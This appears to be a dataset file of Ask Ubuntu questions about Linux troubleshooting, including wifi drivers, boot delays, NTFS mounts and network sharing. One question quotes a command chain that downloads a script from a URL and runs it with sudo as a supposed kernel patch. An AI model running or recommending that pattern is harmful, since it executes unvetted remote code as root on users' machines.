18927	how to enter the default keyring password via the command line ?	is there a way to enter the default keyring password using the command line ? for instance : you have a remote setup of ubuntu 10.10 thats set to auto login . you do n't want to remove the keyring password . all right the system boots up and logs in automatically , then asks for the keyring password now at this point you can create ssh connections but you ca n't remote desktop . what can you do to enter the keyring password at this point ? also , to better clarify , this is from a remote connection using the command line .
18928	wubi doens't work anymore - shows 'no wubildr ' error	basics : hp mini 311 ubuntu netbook edition 10.04 ( installed via wubi ) symptoms : i load to windows boot manager as usual . options are windows 7 and ubuntu netbook , like usual . selecting windows 7 does as it should . loading ubuntu netbook , though , does not take me to the usual screen where it lets me select versions of ubuntu ( sorry for bad wording , not sure what the real name is called ; it 's where you select from about 6 items ; i always picked the first due to lack of knowledge without issue ) . instead it flashes an error in white on a black screen then restarts very quickly . it took me a few restarts , but here is the error : try ( hd0,0 ) : ntsf5 no wubildr try ( hd0,1 ) : ntsf5 : situation : i have no clue what caused it . the only thing i did last night on ubuntu was install skype , but the mic did n't work instantly so i got lazy and switched to windows 7 and used skype on there . when i tried to switch back to ubuntu it began this . ( there may be something i forget ... it was 5 in the morning ) . there were no recent updates that i remember . no weird activity . just ... random . help please ?
18929	wireless problems with atheros ar9285	i have a samsung n210 and just installed ubuntu . i 'm new to linux and i have some problems . i 'm using linksys wrt110 router . when i 'm connected via ethernet cable everything 's fine but when i unplug the cable and try to use wireless it 's really problematic . the connection is unstable . i can use the internet for 5 minutes and then for a couple minutes it 's gone and it comes back again and so on . but the thing is , it always shows that it 's connected , but i ca n't connect to any websites . as i said , no problems with ethernet cable . i made some research , installed samsung-tools ( and then came here to ask ) and realtek 8192e wireless driver for the latest kernel for samsung netbooks with no luck . also i uninstalled network manager and installed wicd , that did n't work either . what may be the problem ? here is the output of the lspci command : 00:00.0 host bridge : intel corporation n10 family dmi bridge 00:02.0 vga compatible controller : intel corporation n10 family integrated graphics controller 00:02.1 display controller : intel corporation n10 family integrated graphics controller 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 02 ) 00:1c.2 pci bridge : intel corporation n10/ich 7 family pci express port 3 ( rev 02 ) 00:1c.3 pci bridge : intel corporation n10/ich 7 family pci express port 4 ( rev 02 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation nm10 family lpc controller ( rev 02 ) 00:1f.2 sata controller : intel corporation n10/ich7 family sata ahci controller ( rev 02 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 02 ) 05:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 09:00.0 ethernet controller marvell technology group ltd. 88e8040 pci-e fast ethernet controller thanks in advance for all the suggestions . p.s . : when i open system > about ubuntu , it says `` you are using ubuntu 11.04 - the natty narwhal - released in april 2011 and supported until october 2012 . '' why does it say 11.04 ? and april 2011 , huh ?
18933	how can you broadcast a network share ( ftp/sftp/webdav ) so that it shows up in nautilus for other users	is there a way to broadcast a network file sharing server that is using a protocol like ftp , sftp , webdav , so that it shows up in naulilus under network : // . i once connected to network where i could see a ftp share . it was a red hat machine . i ask the user how he did this , but he did not know . ( note : i do know how to do this for samba . i 'm interested in how you do it for other protocols . )
18939	is there a way to check if a program is available in the repository by commandline ?	when i find a interesting program i want to test and install in ubuntu i first check if it 's available in the repository . for that i use the software center . but does a possibility exist to check it via commandline i.e . apt or aptitude ? similar apt get install command ?
18943	text expander program	there are a plenty of textexpander programs for mac os x , but i was n't able to find a good textexpander program for ubuntu . could you please share some of them with me .
18946	how do i get a rosewill rnx-n2lx wireless adapter working ?	i 'm not able to install a wireless driver into ubuntu 10.10. the driver is made for linux kernel 2.6.32 and below . there is also an windows driver for it . the wireless device is a rosewill rnx-n2lx . the drivers can be found here : http : //rosewill.com/products/d_1643/productdetail.htm please help me , i just built this new computer but i dont have access to the internet .
18953	differences between qt and gtk programs ?	refering to this question , there are two different versions of the autokey program : autokey ( qt-based ) and autokey-gtk . what are the differences between a qt-based program and the gtk one and are there any differences from the point of view of the user ?
18956	how to set resolution higher than maximum shown ?	i just bought an external monitor for my laptop ( asus vh242h ) but can not set its resolution to anything higher than 1600x900 . i tried both from system/administration/monitors and the ati catalyst control center . there was a cd that came with the monitor but it only contains a windows installer . according to the monitor 's specifications : 23.6â 16:9 widescreen with 1920ă1080 resolution enables borderless full hd 1080p full-screen video display . my graphic card is an ati mobility radeon hd 4670 and the monitor is currently connected to my laptop with a vga cable . how can i set my external monitor to its maximum resolution ?
18958	realtime noise-removal with pulseaudio ?	is it possible to do realtime noise-removal with pulseaudio , so the sound output that 's coming out is smoother ?
18961	login speed varies over time	i have a weird problem with my ubuntu right now . my login speed is never consistent for months , sometimes it changes within weeks . what i mean is , for example , within 2 weeks , boot time is really fast and speedy but then say after that , boot time becomes noticeably slower . usually , right after the ubuntu login sound plays , my desktop would 've finished loading already but sometimes , the ubuntu login sound is already done playing and i 'm still in this stage of the login -- > image , exactly like that . any reasons for this ? sometimes it slows down after updates ( which i think is kind of normal ? ) after a few reboots , it becomes fast then randomly it becomes slow again . edit : as suggested by cyrex , here 's what i found from dmesg . note that i do n't have much of an idea what the numbers represent , i assume it 's some sort of time . here are the ones with the big gaps in them including a horrible , horrible one : [ 1.840381 ] ext4-fs ( sda3 ) : mounted filesystem with ordered data mode [ 12.727535 ] udev : starting version 151 ... *these below are the ones near the bottom of the output of dmesg* ... [ 15.896985 ] vboxdrv : successfully loaded version 3.2.6 ( interface 0x00140001 ) . [ 16.365727 ] ppdev : user-space parallel port driver [ 17.275125 ] hda-intel : irq timing workaround is activated for card # 1 . suggest a bigger bdl_pos_adj . [ 23.218666 ] adding 2097144k swap on /media/storage/ubuntuswap/2048mb.swap . priority : -1 extents:1 across:2097144k [ 200.486521 ] wlan0 : deauthenticating from 34:59:0c:2e:81:3a by local choice ( reason=3 ) [ 200.486796 ] wlan0 : direct probe to ap 34:59:0c:2e:81:3a ( try 1 ) [ 200.685037 ] wlan0 : direct probe to ap 34:59:0c:2e:81:3a ( try 2 ) [ 200.884026 ] wlan0 : direct probe to ap 34:59:0c:2e:81:3a ( try 3 ) [ 201.085044 ] wlan0 : direct probe to ap 34:59:0c:2e:81:3a timed out [ 211.250602 ] wlan0 : direct probe to ap 34:59:0c:2e:81:3a ( try 1 ) [ 211.253054 ] wlan0 : direct probe responded [ 211.253066 ] wlan0 : authenticate with ap 34:59:0c:2e:81:3a ( try 1 ) [ 211.263190 ] wlan0 : authenticated [ 211.263234 ] wlan0 : associate with ap 34:59:0c:2e:81:3a ( try 1 ) [ 211.270763 ] wlan0 : rx assocresp from 34:59:0c:2e:81:3a ( capab=0x411 status=0 aid=7 ) [ 211.270767 ] wlan0 : associated [ 211.271087 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 217.531285 ] ath9k : timeout ( 100000 us ) on reg 0x806c : 0xdeadbeef & 0x01f00000 ! = 0x00000000 [ 217.531403 ] ath9k : rx failed to go idle in 10 ms rxsm=0xdeadbeef [ 221.444033 ] wlan0 : no ipv6 routers present [ 225.203575 ] lo : disabled privacy extensions [ 249.747532 ] process `skype ' is using obsolete setsockopt so_bsdcompat more about my setup : the laptop is setup to dual boot windows 7 and ubuntu . both in a separate partition . however , they share a common separate partition where i put all my files ( /media/storage - > ntfs ) . i also created the ubuntu swap in that shared ntfs partition . looks to me like something 's wrong there..
18962	gujarat fonts - indic	sir , i need to install gujarat fonts - indic . from where shell i get the concerned font file to install ? i had previously win xp and the fonts were installed but the same is not applicable for the ubuntu . in indic case there is a facility to type gujarati as per the pronounciation using english alphabets and also gives display at a corner for guidance that which character required to be typed . please suggest how to avail the same facility in this ubuntu .
18963	network access : i ca n't access 192.168.1.101 from 192.168.1.102	i 'm running ubuntu 10.04 on my pc with ip 192.168.1.101. every thing work fine , e.g . my web server is running and i can see http : //localhost/ or http : //192.168.1.101 properly . but the problem is that i can not see my pc from my laptop at 192.168.1.102 e.g . at my laptop http : //192.168.1.101 gives connection timed out in browser . or trying to telnet on any port leads to : telnet : unable to connect to remote host : connection timed out laptop is running a fresh install of ubuntu as well and there is no setup for firewall stuff in both computers . ps : both computers can ping each other well . the router is a cicso linksys wireless adsl modem . currently , i can connect to ftp server on the windows running on 192.168.1.102 from 192.168.1.101 without problem . i tested the address http : //192.168.1.101 with my friends ' laptops ( they use windows 7 and xp ) . both received `` connection was reset '' . it differs with my laptop 's response . theses are commands ran on my pc , 192.168.1.101 : ifconfig : adp @ adp-desktop : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:26:18 : e1:8e : cf inet addr:192.168.1.101 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe70 : :226:18ff : fee1:8ecf/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1831935 errors:0 dropped:0 overruns:0 frame:0 tx packets:1493786 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1996855925 ( 1.9 gb ) tx bytes:215288238 ( 215.2 mb ) interrupt:27 base address:0xa000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:951742 errors:0 dropped:0 overruns:0 frame:0 tx packets:951742 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:494351095 ( 494.3 mb ) tx bytes:494351095 ( 494.3 mb ) vmnet1 link encap : ethernet hwaddr 00:50:46 : c0:00:01 inet addr:192.168.91.1 bcast:192.168.91.255 mask:255.255.255.0 inet6 addr : fe70 : :250:56ff : fec0:1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:50 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) vmnet8 link encap : ethernet hwaddr 00:50:46 : c0:00:08 inet addr:192.168.156.1 bcast:192.168.156.255 mask:255.255.255.0 inet6 addr : fe70 : :250:56ff : fec0:8/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:51 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) port 80 is set to 0.0.0.0 well : adp @ adp-desktop : ~ $ netstat -ln | grep 'listen ' tcp 0 0 127.0.0.1:52815 0.0.0.0 : * listen tcp 0 0 0.0.0.0:4559 0.0.0.0 : * listen tcp 0 0 0.0.0.0:80 0.0.0.0 : * listen tcp 0 0 0.0.0.0:4369 0.0.0.0 : * listen tcp 0 0 127.0.0.1:7634 0.0.0.0 : * listen tcp 0 0 0.0.0.0:21 0.0.0.0 : * listen tcp 0 0 0.0.0.0:5269 0.0.0.0 : * listen tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen tcp 0 0 0.0.0.0:25 0.0.0.0 : * listen tcp 0 0 0.0.0.0:5280 0.0.0.0 : * listen tcp 0 0 127.0.1.1:7777 0.0.0.0 : * listen tcp 0 0 0.0.0.0:33601 0.0.0.0 : * listen tcp 0 0 0.0.0.0:5222 0.0.0.0 : * listen tcp 0 0 127.0.0.1:3306 0.0.0.0 : * listen tcp6 0 0 : ::139 : : : * listen tcp6 0 0 : :1:631 : : : * listen tcp6 0 0 : ::445 : : : * listen /etc/hosts.deny is empty : adp @ adp-desktop : ~ $ cat /etc/hosts.deny # /etc/hosts.deny : list of hosts that are _not_ allowed to access the system . # see the manual pages hosts_access ( 5 ) and hosts_options ( 5 ) . # # example : all : some.host.name , .some.domain # all except in.fingerd : other.host.name , .other.domain # # if you 're going to protect the portmapper use the name `` portmap '' for the # daemon name . remember that you can only use the keyword `` all '' and ip # addresses ( not host or domain names ) for the portmapper , as well as for # rpc.mountd ( the nfs mount daemon ) . see portmap ( 8 ) and rpc.mountd ( 8 ) # for further information . # # the paranoid wildcard matches any host whose name does not match its # address . # # you may wish to enable this to ensure any programs that don't # validate looked up hostnames still leave understandable logs . in past # versions of debian this has been the default . # all : paranoid netstat -l : adp @ adp-desktop : ~ $ netstat -l active internet connections ( only servers ) proto recv-q send-q local address foreign address state tcp 0 0 localhost:52815 * : * listen tcp 0 0 * : hylafax * : * listen tcp 0 0 * : www * : * listen tcp 0 0 *:4369 * : * listen tcp 0 0 localhost:7634 * : * listen tcp 0 0 * : ftp * : * listen tcp 0 0 * : xmpp-server * : * listen tcp 0 0 localhost : ipp * : * listen tcp 0 0 * : smtp * : * listen tcp 0 0 *:5280 * : * listen tcp 0 0 adp-desktop:7777 * : * listen tcp 0 0 *:33601 * : * listen tcp 0 0 * : xmpp-client * : * listen tcp 0 0 localhost : mysql * : * listen tcp6 0 0 [ : : ] : netbios-ssn [ : : ] : * listen tcp6 0 0 localhost : ipp [ : : ] : * listen tcp6 0 0 [ : : ] : microsoft-ds [ : : ] : * listen udp 0 0 * : bootpc * : * udp 0 0 * : mdns * : * udp 0 0 *:47467 * : * udp 0 0 192.168.1.10 : netbios-ns * : * udp 0 0 192.168.91.1 : netbios-ns * : * udp 0 0 192.168.156. : netbios-ns * : * udp 0 0 * : netbios-ns * : * udp 0 0 192.168.1.1 : netbios-dgm * : * udp 0 0 192.168.91. : netbios-dgm * : * udp 0 0 192.168.156 : netbios-dgm * : * udp 0 0 * : netbios-dgm * : * raw 0 0 * : icmp * : * 7 netstat -rn : adp @ adp-desktop : ~ $ netstat -rn kernel ip routing table destination gateway genmask flags mss window irtt iface 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 192.168.91.0 0.0.0.0 255.255.255.0 u 0 0 0 vmnet1 192.168.156.0 0.0.0.0 255.255.255.0 u 0 0 0 vmnet8 169.254.0.0 0.0.0.0 255.255.0.0 u 0 0 0 eth0 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 commands on the laptop , 192.168.1.102 : ifconfig : root @ fakeuser-laptop : ~ # ifconfig eth0 link encap : ethernet hwaddr 00:1c:33 : a2:31:15 up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:21 eth1 link encap : ethernet hwaddr 00:2d : d9:3e:1f:6c inet addr:192.168.1.102 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe70 : :21d : d9ff : fe3e:1f6c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5681 errors:0 dropped:0 overruns:0 frame:10313 tx packets:6717 errors:6 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4055251 ( 4.0 mb ) tx bytes:779308 ( 779.3 kb ) interrupt:18 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:206 errors:0 dropped:0 overruns:0 frame:0 tx packets:206 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:15172 ( 15.1 kb ) tx bytes:15172 ( 15.1 kb ) netstat -rn : root @ fakeuser-laptop : ~ # netstat -rn kernel ip routing table destination gateway genmask flags mss window irtt iface 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 169.254.0.0 0.0.0.0 255.255.0.0 u 0 0 0 eth1 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth1 telnet : fakeuser @ fakeuser-laptop : ~ $ telnet 192.168.1.101 25 trying 192.168.1.101 ... telnet : unable to connect to remote host : connection timed out fakeuser @ fakeuser-laptop : ~ $ telnet 192.168.1.101 22 trying 192.168.1.101 ... telnet : unable to connect to remote host : connection timed out fakeuser @ fakeuser-laptop : ~ $ telnet 192.168.1.101 80 trying 192.168.1.101 ... telnet : unable to connect to remote host : connection timed out
18966	why do i have to reconnect my usb router cable ?	i have a iball baton adsd2+ router . it 's working fine but the problem is when i boot into ubuntu i have to unplug the usb cable and then plug it again , then it starts working . why do i have to re connect my usb cable ? let me know if you need more details . edit : i am using a direct connection . i mean to say i do n't have to enter a username or password . i am connected to internet as soon as i start my router . the problem is if i start my router before my computer i have to re connect my usb cable . edit 1 : i tried have tried to start my router after boot , but just before login and my router connects . but i do n't know why my router does not connect if i start before boot ? edit 2 : if i use ethernet cable for connecting my router i do n't have to re connect it again , but the problem still exists for the usb cable . thanks .
18967	monitor turns off when i unplug from ac power , how do i stop this ?	i 'm running natty on a 13 '' macbook pro , and when i unplug the ac power sometimes , the monitor turns off . sometimes i can unplug the ac adapter and nothing happens , but as soon as it starts happening it happens every time i unplug . when i plug the adapter back in , the monitor comes back .
18968	indexing file contents	people seem to have already asked about indexing file system : what options are there for indexing my filesystem ? alternatives to os x 's spotlight ? but i want to actually just index a certain working directory and be able to do that manually ( so that i make sure my search is correct ) . basically , i am on working a project and i need be able to search in contents quickly . i already use 'locate ' and 'updatedb ' commands , but those search for file names only . i am looking for similar commands but file contents . just in case you are wondering why i do n't use tracker also like answered in the two posts , tracker have a set of prespecified folders to search in them , and whenever you make a search , you search in all of them . what i want is to be able to search in every project separately .
18969	how to show context menu when right-click released ?	i 'm using ubuntu 10.04 . when i right-click , menu popup too quickly , and the first menu item is clicked . if i right-click in desktop , it create a new folder sometime . if i right-click in terminal , it open a new terminal sometime . ... is there some way to delay context menu ? or how can i offset context menu a little bit pixels to the right-bottom direction ? ( like firefox ) or how can i config gnome to popup menu when right-mouse released ? ( like windows xp )
18970	is there a way to suppress one specific message from syslog ?	i 'm getting a lot of dec 27 08:35:49 htpc kernel : [ 1552.153797 ] pciehp 0000:00:1c.5 : pcie04 : card not present on slot ( 0-2 ) dec 27 08:35:49 htpc kernel : [ 1552.157744 ] pciehp 0000:00:1c.5 : pcie04 : card present on slot ( 0-2 ) messages in my syslog , about 10 every second . that just makes syslog unusable , can i somehow get rid of them ? i do n't know and do n't really care about the reason of those messages being there , partly because my motherboard does n't have pcie slots on it and partly because everything i care about works perfectly . that might be a wifi chip i disabled in bios but hey , i do n't want wifi to be powered on , i 'm not using it . so can i just suppress those messages ?
18972	why wo n't opera let me use the ubuntu font ?	this is driving me crazy . i 'm using monochrome rendering for fonts and this causes a few problems in my browser so i wanted to make ubuntu the standard sans-serif font . i changed it in the preferences and it initially works okay but after a while it reverts to the default . if i go into the font section in the menu , it still lists ubuntu and if i click ok the pages will correct themselves . does anyone know i can stop this behaviour ? i 'm using opera 11 on ubuntu 10.10
18973	how do i install inventel ur056g usb wifi ?	i am am using a inventel ur054g ( r01 ) usb wireless adaptor on my desktop . i had quite trouble setting it up but after installing ndiswrapper and prism2 drivers i got it up and running . however , i need to run in the command line the following to get it started ; sudo dhcpcd wlan0 i want this top start automatically when i restart the pc . further , i aslo want this connection to be available to other users . any help would be appreciated .
18975	can i change the name of the guake tab to show the current command ?	i use guake very heavily , and ssh into more than 3 computers at any point in time . i also have daemons running on some tabs ( terminals ) . what i want to know , is it possible to have the name of the current command as the name of the terminal ? rightclikcing a tab , and changing its name causes this : ( look at the tab after terminal 5 ) thanks .
18982	sd card only mounted after a reboot	i have a kingston 2gb microsd and i plug it in via an inconix microsd adapter to the internal card reader of my samsung n210 netbook with ubuntu 10.10 , but it does n't show up . only if i reboot the system when the card 's plugged in it shows up . why does it need a reboot for mounting ? sudo fdisk -l gives the output below . but i can only see the drive when i reboot the computer while the card 's plugged . disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x9a5a7990 device boot start end blocks id system /dev/sda1 1 1959 15728640 27 unknown partition 1 does not end on cylinder boundary . /dev/sda2 * 1959 1972 102400 7 hpfs/ntfs /dev/sda3 1972 18992 136718750 83 linux /dev/sda4 18992 19458 3738625 5 extended /dev/sda5 18992 19458 3738624 82 linux swap / solaris disk /dev/sdb : 1973 mb , 1973420032 bytes 60 heads , 59 sectors/track , 1088 cylinders units = cylinders of 3540 * 512 = 1812480 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 1 1089 1927100+ 6 fat16
18983	3d graphics do n't work with sis mirage graphics chip	i wanted to test ubuntu 11.04 on my fujitsu siemens esprimo mobile v5535 laptop but on first boot i get the message : `` sorry , you do n't have 3d support , install it for your graphic hardware to get unity or please reboot and select 'classic session ' at startup . '' i had windows 7 on this laptop and all the visual effects worked just fine . does anyone knows where can i get drivers that support 3d ?
18987	how to undo an improper purge ?	as the title says , i did sudo apt-get purge mysql* and as a result , all packages with mysql in their name were purged . i tried a sudo apt-get install mysql* but , it also selected packages that were n't installed , and have broken dependencies . is there another way , other than copy-pasting each of the unselected package ? thanks .
18990	best way to set up a haskell development platform	since a while , i 'm developing in haskell . my question is : what 's the easiest way to set up a reasonable development system for haskell ? i installed the official packages , but imo it 's not working very well and some times conflicting whith cabal installed packages . is there anybody with experiences for a better platform ? i possibly want to install ghc 7.0 instead of the haskell platform .
18991	touchpad problem on probook 4420s	i have an hp probook 4420s and just installed ubuntu on it . right click and scroll is really messy . i just can not get it to work properly . is there is a known standard solution for the same ? should i download and install netbook edition , will it help ?
18998	how do i open a file browser in the netbook edition ?	i ca n't figure out how to get a file browser ( nautilus , etc . ) in netbook edition 10.10 ( unity ) . how do i do this ?
19003	permanently mounting windows ' ntfs partition , fully enabled	i 'm transforming a windows 7 pc into a dual boot system with ubuntu 10.10 . following other questions on this site , i 've mounted my windows drive by adding this to fstab uuid=blabla /windows ntfs users , defaults , umask=000 0 0 it appears to work well , i can read and write , but it appears to be a bit crippled still . when i tried to update an svn working copy with rabbitvcs , it complained that it could n't write to a temporary file inside the working copy , even though the permissions are all on 0777 inside /windows ( by default , i have n't done that manually ) . it even corrupted that working copy : ( it works when i use the command line svn client with sudo , but that 's hardly user friendly .
19005	using `` oblivion '' color scheme from gedit in kate	i like gedit 's color scheme oblivion a lot . is there a way to use the same color scheme in kate text editor ? i know that configuration files for color scheme for gedit and kate are n't compatible . i wonder if someone already adapted oblivion scheme for kate . thanks
19008	looking for information about upcoming dockbarx releases	i posted a question a while back asking about turning off grouping in dockbarx . someone left a comment indicating that it was being worked on and would be available in the next release , but that someone did n't provide any kind of documentation and i ca n't find anything online that supports the claim . has anyone seen anything that would indicate that ungrouping is , indeed , being added to the next release ? if so , please provide a link to the source .
19011	how can i speed up boot on one of my machines ?	i have a gateway all in one machine ( 2 gig intel core 2 duo t7250 dual core processor , 2 gig ram - full specs ) on which i installed 10.10 . once it has booted it 's fine , but it takes forever to boot . this is what happens : 1 . boot starts with cursor flashing for about 10-15 seconds 2 . cursor disappears for 1.5 - 2 minutes 3 . cursor reappears , blinks a few seconds more , boot finishes in another 10 seconds 4 . login screen i have another machine with marginal better specs that boots up in no time ( basically the above minus the two minute delay ) . things i 've done : enabled verbose mode for grub > > nothing is showing until after 2 minute pause . checked syslog > > last message before pause is a message from alsa saying the process is already running ( or something similar ... going from memory here ... ) it could be something sound related as the built in speakers are not working ( sound card is recognized though and headphones work ) . anyway , it 's not the end of the world , but it 's annoying and i 'd like to know what 's going on ... many thanks , and let me know if more info is needed . edit no matter what i tried i could not get into safe mode ... shift did n't work and esc did n't work . i did boot into recovery mode using startupmanager which did n't make a difference . i installed bootchart per maxime , and according to bootchart it takes about 20s to boot up , which is pretty much the time from the moment the cursor reappears to the time the login screen shows up ...
19013	how do i remove ndiswrapper completely ?	i would like to remove the ndiswrapper from my system after mistakenly installing it to enable a wifi card that it turned out had native ubuntu support and only required firmware . what is the full process and what things must i be aware of ?
19014	lan visibility and network sharing	i have two ubuntu machines with wifi network cards configured as dhcp interfaces . machine1 : inet addr:192.168.168.105 bcast:192.168.168.255 mask:255.255.255.0 gateway : 192.168.168.252 machine2 : inet addr:192.168.168.104 bcast:192.168.168.255 mask:255.255.255.0 gateway : 192.168.168.252 they are connected to the router : inet addr : 192.168.168.252 internet connection from the router is accessible on both of the machines . how to share files between those two ? i have already tried few ways ( eg . samba ) , but it looks like the machines are not visible to each other : @ machine1 $ : ping 192.168.168.104 from 192.168.168.105 icmp_seq=1 destination host unreachable what do i need to configure ? apparmor ? firewall ?
19017	how to create the xml file for podcasting ?	i 'm interested in podcasting . my only worry is how to create an xml file to give all the information about the audio file .
19018	how do i use rogers nokia cs-18 rocket stick ?	i 've just got a rogers nokia cs-18 rocket stick but when i plug it into my laptop it does n't get recognized as a 3g modem . i 've rebooted and tried plugging it into windows first but nothing seems to work . why wo n't ubuntu 10.10 detect this ?
19024	xfce4 network manager	my standard kubuntu 10.04 installation works perfectly but now i 'm trying the lighter xfce window manager . i ca n't find any gui tool to configure networks . someone on the web talks about the gnome applets container but i do n't want to use gnome . how to configure network in xfce ?
19027	ubuntu on the sony vaio vpcy 21s1e	my girlfriend got a new subnotebook for christmas ( sony vayo vpcy21s1e ) , which comes with an `` intel hd graphics '' vga adaptor . when i try to boot the ubuntu installer from usb , the screen goes blank after a short while , before i even see the ubuntu logo . however , when i select `` nomodeset '' in the boot options , i can boot it to the cli login prompt . when i start x , though , that only works in vesa mode ( i 've read intel eventually got rid of usermode mode setting and only offers kms now , which i 've disabled to get it to boot ) . what can i do to enable a ) higher resolution than 1024x768 in vesa b ) hardware acceleration for compiz , video playback , etc ?
19029	switch from netbook edition 10.10 to desktop edition ?	i installed 10.10 netbook , and want to use the desktop edition . i tried logging in with the desktop edition profile running , but when it loads , there are no panels on top or bottom , so the experience is quite incomplete . how does one get those panels running ?
19035	is apache server part of default installation ?	i have a running apache2 server on my computer . as i do not use it as a server , can i remove it safely ( to save ram , boot-up time , etc . ) or is it still useful ( like part of ubuntu default installation ) ?
19038	snippet code manager like snippets ?	i 'm looking some snippets code manager on ubuntu like snippets ( for the mac ) with syntax highlighting ( html , css , php ) . thanks for help .
19040	can not install build essential from the cd ?	after a fresh installation of ubuntu 10.10 i tried to install build-essential from the ubuntu installation cd . i put the cd in the cdrom and in the software repositories i checked the box install from cd ( ubuntu 10.10 release maverick meerkat ) . then i reloaded the software repositories . the synaptic manager then tried to download some repository related files but failed to do so as i did n't have internet connection . then i open a terminal and wrote sudo apt-get install build-essential . it prompted me if i want to install build essential y/n . i typed y but the terminal showed some errors and was not installed . i also tried to add the cd in the software repositories . i clicked add and it prompted me to insert a cd while the cd was still inside the cdrom . i clicked `` ok '' then and it showed it could not find any cd . what is wrong ?
19041	security problem with sudo su ?	by typing sudo su , any sudoer can go into the root prompt & thus change the root password ! then what is the use of having a root & then the sudoers , because now sudoers can interfere with the root account ! does n't this sound odd ? ?
19049	disk utility running for a long time	i had a spare , old external usb hard disk which stopped working long time back due to improper removal of disk . i tried fixing it in windows ( when i did not have ubuntu yet ) , however i could n't fix it . so i tried formatting the disk and creating a new partition using the disk utility in ubuntu . however it seems to keep running without any indication of the progress or whatsoever . i have no idea what is happening . i have attached a screenshot below to show what i mean . as you can from the screenshot above it seems to be working on it but no indication on the progress or what it is doing . any attempt to exit it or do any other task like safe removal or format partition leads to the the following dialog box . what should i do ? wait or restart the computer.. ? ? ? update : i installed gparted as per the answer however when creating the partition of the type ext4 i had the same problem . it ran for hours ( i waited around 10 hours ) and when i checked it was stuck . the application froze . so i restarted and then deleted the disk and then created a new partition of the type ntfs and it was done in 5 minutes ! ! the problem seems to be creating a ext4 partition . any reasons why ?
19051	is it recommended to apply the new said-great 200 line linux kernel patch ?	nowadays i 'm hearing a lot about the new ~200 line path to linux kernel that is said makes sensible difference in performance . now , do anyone has experience on applying this path on his ubuntu kernel ? i also saw an alternative way that claimed has a better result : wget http : //launchpadlibrarian.net/59511828/cgroup_patch chmod +x cgroup_patch sudo ./cgroup_patch what do you think this is ? is this validated ? i ask this question because i need more performance but i ca n't risk on stability .
19052	problem uploading a file to ubuntu one using the web interface	when i try to upload a file via the ubuntu one web interface , the server constantly goes down , and it 's impossible upload a tiny file . any suggestion as to what is happening ?
19054	nautilus only starts as root user	i am running ubuntu 10.04 64-bit , and when i attempt to start nautilus from the command line , it does not appear -- although a pid is generated . as root/sudo i can start nautilus fine . one note : i run e16 as the windows manager , so i do not use nautilus to draw my desktop . however , even under this configuration , nautilus used to run fine as a `` regular '' user . the permissions for nautilus are the same as the other packages in /usr/bin . i believe this is a gnome issue , but i 'm fumbling at this point .
19055	how to start mp3info-gtk	i 'm using the gui version of mp3info called mp3info-gtk . it installed successfully on my system but there is no icon in applications and the terminal says command not found . how do i start it ? the documentation does n't have anything that i can find in it .
19064	some of commands are not working in vim	i am just new to vim and i am following these tutorials for vim . but some of my commands are not working in vim like : -- capital w. f followed by a character . ( to move to next same char . ) can any body tell why this is happening .
19065	why does firefox return 'server not found ' , and seamonkey loads url perfectly ?	firefox on my system can not connect to http : //docs.jquery.com . when i try the same address in seamonkey , on the same system , it works perfectly . any thoughts why firefox can not load the site ?
